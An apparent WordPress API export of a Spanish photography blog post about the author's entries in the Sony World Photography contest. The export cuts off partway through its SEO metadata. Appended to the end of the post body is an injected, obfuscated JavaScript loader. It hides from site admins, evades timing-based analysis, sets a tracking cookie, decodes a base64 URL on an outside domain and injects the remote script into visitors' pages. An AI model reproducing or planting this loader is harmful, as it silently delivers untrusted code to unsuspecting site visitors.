{"id":3366,"date":"2022-01-12T11:29:10","date_gmt":"2022-01-12T10:29:10","guid":{"rendered":"http:\/\/www.perez-tome.net\/pptgrafia\/?p=3366"},"modified":"2026-02-04T15:49:47","modified_gmt":"2026-02-04T14:49:47","slug":"participacion-en-el-sony-world-photography","status":"publish","type":"post","link":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/","title":{"rendered":"Participaci\u00f3n en el Sony World Photography"},"content":{"rendered":"<p>Participaci\u00f3n en el Sony World Photography: Este a\u00f1o me he apuntado en dos categor\u00edas del concurso Sony World Photography: paisaje y retrato con cinco fotos de cada tema.<\/p>\n<p>Concurso Categor\u00eda Fotograf\u00edas presentadas<br \/>\nProfessional competition Paisaje 5 fotograf\u00edas<\/p>\n<p>&nbsp;Nombre: On Holydays s<strong>caping from Madrid to Galicia: Ria of Arosa<\/strong><\/p>\n<p>Skyline of Madrid from Paracuellos del Jarama &#8211; Arquitectura<\/p>\n<p><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3367 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg\" alt=\"\" width=\"800\" height=\"399\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-1282x640.jpg 1282w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-768x383.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-1536x767.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-2048x1022.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>School of traditional sailing in Ria of Arosa &#8211; Deportes<\/p>\n<p><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3369 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-scaled.jpg\" alt=\"\" width=\"800\" height=\"360\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-1422x640.jpg 1422w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-768x346.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-1536x691.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210820_195253-2048x922.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Cloudy day by the coast &#8211; Paisaje<br \/>\n<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3368 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-scaled.jpg\" alt=\"\" width=\"800\" height=\"360\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-1422x640.jpg 1422w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-768x346.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-1536x691.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210821_194815-2048x922.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>The sky in Santiago de Compostela has soul,&#8230; &#8211; Arquitectura<\/p>\n<p><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3370 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-scaled.jpg\" alt=\"\" width=\"800\" height=\"399\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-1283x640.jpg 1283w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-768x383.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-1536x766.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/IMG_20210826_1312432-2048x1021.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Sunset from my room from my window<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3371 alignnone\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-scaled.jpg\" alt=\"\" width=\"672\" height=\"412\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-1044x640.jpg 1044w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-768x471.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-1536x941.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC04378-2048x1255.jpg 2048w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Professional competition Retratismo:&nbsp; <strong>Friends in the field<\/strong><\/p>\n<div class=\"col-xs-12 col-sm-12 col-md-12\">\n<div class=\"panel panel-default\">\n<div class=\"panel-body\">\n<div class=\"row\">\n<div class=\"col-xs-12 col-sm-12 col-md-8 value\">\n<p>Descripci\u00f3n: <strong>Natural portraits of happiness in the field<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">Paco and his smile<\/p>\n<\/div>\n<\/div>\n<div class=\"row\" style=\"text-align: center;\">\n<p><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3372 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-scaled.jpg\" alt=\"\" width=\"800\" height=\"533\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-768x512.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-1536x1024.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05065-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>The little girl playing baseball<\/p>\n<\/div>\n<div class=\"row\" style=\"text-align: center;\">\n<p><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3373 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-scaled.jpg\" alt=\"\" width=\"440\" height=\"625\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-scaled.jpg 563w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-451x640.jpg 451w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-440x625.jpg 440w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-768x1091.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-1082x1536.jpg 1082w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05136-1442x2048.jpg 1442w\" sizes=\"auto, (max-width: 440px) 100vw, 440px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Nacho, the inspirator Father<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3374 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-scaled.jpg\" alt=\"\" width=\"624\" height=\"625\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-639x640.jpg 639w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-624x625.jpg 624w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-150x150.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-768x769.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-1534x1536.jpg 1534w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05163-2045x2048.jpg 2045w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">The elder girl, now singer and composer of carols<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3375 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-scaled.jpg\" alt=\"\" width=\"800\" height=\"558\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-917x640.jpg 917w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-768x536.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-1536x1072.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05188-2048x1429.jpg 2048w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\">Salva, the artist<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-3376 size-full\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-scaled.jpg\" alt=\"\" width=\"417\" height=\"625\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-scaled.jpg 533w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-427x640.jpg 427w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-417x625.jpg 417w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-768x1152.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-1024x1536.jpg 1024w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05197-1365x2048.jpg 1365w\" sizes=\"auto, (max-width: 417px) 100vw, 417px\" \/><\/a><\/p>\n<p>Participaci\u00f3n en el Sony World Photography: He intentado sacar en las fotos el alma de lo fotografiado y de los fotografiados,&#8230;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Participaci\u00f3n en el Sony World Photography: Este a\u00f1o me he apuntado en dos categor\u00edas del concurso Sony World Photography: paisaje y retrato con cinco fotos [&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3366","post","type-post","status-publish","format-standard","hentry","category-blog-visual"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"og:description\" content=\"Participaci\u00f3n en el Sony World Photography: Este a\u00f1o me he apuntado en dos categor\u00edas del concurso Sony World Photography: paisaje y retrato con cinco fotos [...]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/\" \/>\n<meta property=\"og:site_name\" content=\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-12T10:29:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-04T14:49:47+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"399\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/\"},\"author\":{\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"headline\":\"Participaci\u00f3n en el Sony World Photography\",\"datePublished\":\"2022-01-12T10:29:10+00:00\",\"dateModified\":\"2026-02-04T14:49:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/\"},\"wordCount\":178,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/DSC05664-scaled.jpg\",\"articleSection\":[\"Blog visual y mental\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/\",\"name\":\"Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/DSC05664-scaled.jpg\",\"datePublished\":\"2022-01-12T10:29:10+00:00\",\"dateModified\":\"2026-02-04T14:49:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#primaryimage\",\"url\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/DSC05664-scaled.jpg\",\"contentUrl\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/DSC05664-scaled.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/participacion-en-el-sony-world-photography\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Participaci\u00f3n en el Sony World Photography\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\",\"name\":\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"description\":\"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\",\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"caption\":\"Pablo P\u00e9rez-Tom\u00e9\"},\"logo\":{\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\"},\"description\":\"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a\",\"sameAs\":[\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/","og_locale":"es_ES","og_type":"article","og_title":"Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","og_description":"Participaci\u00f3n en el Sony World Photography: Este a\u00f1o me he apuntado en dos categor\u00edas del concurso Sony World Photography: paisaje y retrato con cinco fotos [...]","og_url":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/","og_site_name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","article_published_time":"2022-01-12T10:29:10+00:00","article_modified_time":"2026-02-04T14:49:47+00:00","og_image":[{"width":800,"height":399,"url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg","type":"image\/jpeg"}],"author":"Pablo P\u00e9rez-Tom\u00e9","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Pablo P\u00e9rez-Tom\u00e9","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#article","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/"},"author":{"name":"Pablo P\u00e9rez-Tom\u00e9","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"headline":"Participaci\u00f3n en el Sony World Photography","datePublished":"2022-01-12T10:29:10+00:00","dateModified":"2026-02-04T14:49:47+00:00","mainEntityOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/"},"wordCount":178,"commentCount":0,"publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#primaryimage"},"thumbnailUrl":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg","articleSection":["Blog visual y mental"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/","url":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/","name":"Participaci\u00f3n en el Sony World Photography - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#primaryimage"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#primaryimage"},"thumbnailUrl":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg","datePublished":"2022-01-12T10:29:10+00:00","dateModified":"2026-02-04T14:49:47+00:00","breadcrumb":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#primaryimage","url":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg","contentUrl":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/01\/DSC05664-scaled.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/participacion-en-el-sony-world-photography\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https